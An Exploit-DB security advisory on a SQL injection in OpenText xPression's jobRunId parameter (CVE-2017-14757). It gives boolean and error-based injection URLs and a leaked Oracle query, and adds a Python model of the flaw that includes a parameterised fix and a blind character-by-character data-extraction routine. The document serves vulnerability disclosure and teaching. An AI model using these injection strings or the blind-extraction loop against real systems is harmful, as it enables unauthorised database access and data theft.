exploitdb | Marcin Woloszyn | EDB-ID: 42939
History: Oct 02, 2017 - 12:00 a.m.

OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection

2017-10-02 00:00:00
Marcin Woloszyn
www.exploit-db.com

CVSS2: 6.5 Medium
AV:N/AC:L/Au:S/C:P/I:P/A:P
Attack Vector: NETWORK; Attack Complexity: LOW; Authentication: SINGLE;
Confidentiality Impact: PARTIAL; Integrity Impact: PARTIAL; Availability Impact: PARTIAL

CVSS3: 8.8 High
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: LOW;
User Interaction: NONE; Scope: UNCHANGED;
Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH

AI Score: 8.9 High (Confidence: High)

EPSS: 0.002 Low (Percentile: 55.7%)

Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27 September 2017
CVE: CVE-2017-14757

Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)

Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)

SQL Injection:
==============

The application builds the query by string concatenation instead of using
prepared statements, so the jobRunId parameter of the job-history support
file download is vulnerable to SQL injection.
An authenticated attacker (the CVSS vectors rate it Au:S / PR:L) can
retrieve data from the application database by exploiting the issue.

Vector:
--------

True (injected condition 1=1 holds, job run is returned):
http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
False (injected condition 1=2 fails, no job run is returned):
http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2

Additionally:

http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa

produces the following error in the response (HTML entities decoded; the
application HTML-escapes the exception text before echoing it):

HTTP/1.1 200 OK
[...]
  <b>Errors:&nbsp;</b>

  See nested exception; nested exception is:
java.lang.RuntimeException:
com.dsc.uniarch.cr.error.CRException: CRReportingSL: Method
getJobRunsByIds did not succeed because of a database operation
failure.;
	---> nested com.dsc.uniarch.cr.error.CRSyntaxException:
Database syntax error :SELECT  JOBRUN_ID, JOB_NAME,
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
FROM T_JOBRUN WHERE
JOBRUN_ID=1502642747222443244706554841153aaa.;
	---> nested java.sql.SQLSyntaxErrorException:
ORA-00933: SQL command not properly ended

The error discloses the complete query and the injection point: an
unquoted numeric JOBRUN_ID predicate against an Oracle backend (ORA-00933).
Besides the boolean-based vector above, the verbose error can also be
used for error-based data extraction.
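The following Python block is an added example; it is not code from the advisory or from OpenText. It models the flaw against an in-memory SQLite database standing in for Oracle (so the error text and the string functions differ from ORA-00933 and Oracle's SUBSTR/ASCII), uses constructed sample data with a shorter job-run ID that fits SQLite's 64-bit integers, and the function names and the DisclosedSyntaxError class are assumptions. It reproduces the true/false vector and the disclosed-query error, shows the parameterised fix, and goes one step beyond the advisory by turning the boolean oracle into character-by-character extraction of JOB_NAME.

```python
"""Added example (not from the advisory or OpenText): the xPression jobRunId
flaw modelled against an in-memory SQLite stand-in for the Oracle backend."""
import re
import sqlite3

# Constructed sample data: one row shaped like the T_JOBRUN columns that the
# leaked query names. The ID is kept within 64 bits for SQLite.
_DB = sqlite3.connect(":memory:")
_DB.execute(
    "CREATE TABLE T_JOBRUN (JOBRUN_ID INTEGER PRIMARY KEY, JOB_NAME TEXT, STATUS TEXT)"
)
_DB.execute("INSERT INTO T_JOBRUN VALUES (1502642747222, 'NightlyBatch', 'DONE')")
_DB.commit()

COLUMNS = "JOBRUN_ID, JOB_NAME, STATUS"


class DisclosedSyntaxError(Exception):
    """Hypothetical stand-in for CRSyntaxException: the SQL text reaches the client."""


def get_job_run_vulnerable(job_run_id: str):
    """String concatenation, as the leaked query shows: whatever arrives in
    jobRunId becomes part of the SQL statement."""
    sql = f"SELECT {COLUMNS} FROM T_JOBRUN WHERE JOBRUN_ID={job_run_id}"
    try:
        return _DB.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # The advisory response echoes the failing query; mimic that here.
        raise DisclosedSyntaxError(f"Database syntax error :{sql}. ({exc})") from exc


def get_job_run_fixed(job_run_id: str):
    """Validate the type, bind the value as a parameter, and never echo SQL."""
    if not re.fullmatch(r"[0-9]+", job_run_id):
        raise ValueError("jobRunId must be a decimal integer")
    sql = f"SELECT {COLUMNS} FROM T_JOBRUN WHERE JOBRUN_ID=?"
    try:
        # OverflowError covers IDs beyond SQLite's 64-bit range (Oracle NUMBER is wider).
        return _DB.execute(sql, (int(job_run_id),)).fetchone()
    except (sqlite3.Error, OverflowError):
        raise RuntimeError("database error") from None  # generic, no query text


def _oracle(condition: str) -> bool:
    """True/false oracle built on the vulnerable endpoint: the row comes back
    only when the injected condition holds (the advisory's 1=1 vs 1=2)."""
    return get_job_run_vulnerable(f"1502642747222 and ({condition})") is not None


def extract_job_name_blind(max_len: int = 32) -> str:
    """Recover JOB_NAME one character at a time by binary search on its code
    point. SQLite's unicode()/substr() stand in for Oracle's ASCII()/SUBSTR()."""
    out = ""
    for pos in range(1, max_len + 1):
        if not _oracle(f"length(JOB_NAME) >= {pos}"):
            break
        lo, hi = 0, 127  # invariant: code point of this character is in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if _oracle(f"unicode(substr(JOB_NAME,{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def run_demo() -> dict:
    """Exercise the three advisory vectors against both implementations."""
    results = {"fixed_rejects": []}
    results["true"] = get_job_run_vulnerable("1502642747222 and 1=1")
    results["false"] = get_job_run_vulnerable("1502642747222 and 1=2")
    try:
        get_job_run_vulnerable("1502642747222aaa")
    except DisclosedSyntaxError as exc:
        results["leak"] = str(exc)
    results["fixed_ok"] = get_job_run_fixed("1502642747222")
    for bad in ("1502642747222 and 1=1", "1502642747222aaa"):
        try:
            get_job_run_fixed(bad)
        except ValueError:
            results["fixed_rejects"].append(bad)
    results["blind"] = extract_job_name_blind()
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Binding alone removes the injection; the regex check is there so that a malformed value such as the trailing "aaa" yields a clean 4xx-style rejection instead of a database exception, and the generic RuntimeError is what keeps the query text out of the response. The blind loop needs only the true/false difference the advisory already shows, which is why verbose errors are a convenience for the attacker rather than a requirement.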

Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774

Contact:
========
mw[at]nme[dot]pl
